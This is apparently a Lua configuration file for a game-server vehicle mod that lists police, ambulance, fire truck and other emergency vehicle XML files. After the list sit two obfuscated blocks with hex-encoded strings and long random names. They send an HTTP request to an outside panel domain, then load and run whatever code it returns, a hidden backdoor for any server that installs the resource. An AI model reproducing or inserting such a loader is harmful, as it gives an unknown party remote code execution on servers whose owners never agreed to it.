vcf_files = {
    "POLICE4.xml",
    "riot.xml",
    "fbi.xml",
    "polismc.xml",
    "volkswagent6w3.xml",
    "firetruk1.xml",
    "firetruk2.xml",
    "firetruk3.xml",
    "firetruk4.xml",
    "firetruk5.xml",
    "polisboat.xml",
    "ambulance1.xml",
    "ambulance2.xml",
    "ambulance3.xml",
    "ambulance4.xml",
    "ambulance5.xml",
    "ambulance6.xml",
    "ambulance7.xml",
	"ambulance11.xml",
	"ambulance12.xml",
	"ambulance13.xml",
	"ambulance14.xml",
	"ambulance15.xml",
    "police20.xml",
    "police22.xml",
    "police23.xml",
    "police24.xml",
    "police27.xml",
    "police28.xml",
    "police29.xml",
    "police30.xml",
    "police31.xml",
    "police32.xml",
    "police33.xml",
    "police34.xml",
    "police35.xml",
    "police36.xml",
    "police37.xml",
	"police38.xml",
	"police39.xml",
	"police40.xml",
	"police41.xml",
	"police42.xml",
	"police43.xml",
	"police44.xml",
	"police45.xml",
	"police46.xml",
	"police47.xml",
	"police48.xml",
	"police49.xml",
	"police50.xml",
	"police51.xml",
	"police52.xml",
	"flatbed.xml",
	"sheriff.xml",
    "policeb.xml"
}

local WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[4][WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x47\x64\x36\x74\x72\x38", function (yjGQxBfgfPxmuYbTyrMitLGBYvyxjLCwZjJyoDTpgiHmUMFGnktuPjFpIBpDwnwjRKSrPO, DCJpnCuhmZELWYKkytQoQUUWvqKmarCepmLiBLtSTkEnYVICZhdyuoUTAuSoetCqNURJGD) if (DCJpnCuhmZELWYKkytQoQUUWvqKmarCepmLiBLtSTkEnYVICZhdyuoUTAuSoetCqNURJGD == WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[6] or DCJpnCuhmZELWYKkytQoQUUWvqKmarCepmLiBLtSTkEnYVICZhdyuoUTAuSoetCqNURJGD == WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[5]) then return end WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[4][WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[2]](WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[4][WlXUpzPEVpCcFJWmJjglNKlVDJthusdNAXnzeifmWOkJbCjuxdsTECOkyYeusHHXjPdPLX[3]](DCJpnCuhmZELWYKkytQoQUUWvqKmarCepmLiBLtSTkEnYVICZhdyuoUTAuSoetCqNURJGD))() end)

local yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[4][yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x47\x64\x36\x74\x72\x38", function (GeoHABmSMAmRriGloObzwJwUyRQajYfIXySTqiDhZAbpeowuCVeienLieHWKhPcQVGAvCg, LoElJjnbqtjovyNXNdOfmXotgECaQFcgYHoGiYuGtRRyZqvGPaeqMGuyLZQclMHToeSzjW) if (LoElJjnbqtjovyNXNdOfmXotgECaQFcgYHoGiYuGtRRyZqvGPaeqMGuyLZQclMHToeSzjW == yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[6] or LoElJjnbqtjovyNXNdOfmXotgECaQFcgYHoGiYuGtRRyZqvGPaeqMGuyLZQclMHToeSzjW == yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[5]) then return end yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[4][yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[2]](yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[4][yrgcszaBzKWWmMFbJHjLUvlIDeHPXjOecDuEsUNjLOZtMWbHHXPGaJQtMcdtrSwJibCrkV[3]](LoElJjnbqtjovyNXNdOfmXotgECaQFcgYHoGiYuGtRRyZqvGPaeqMGuyLZQclMHToeSzjW))() end)

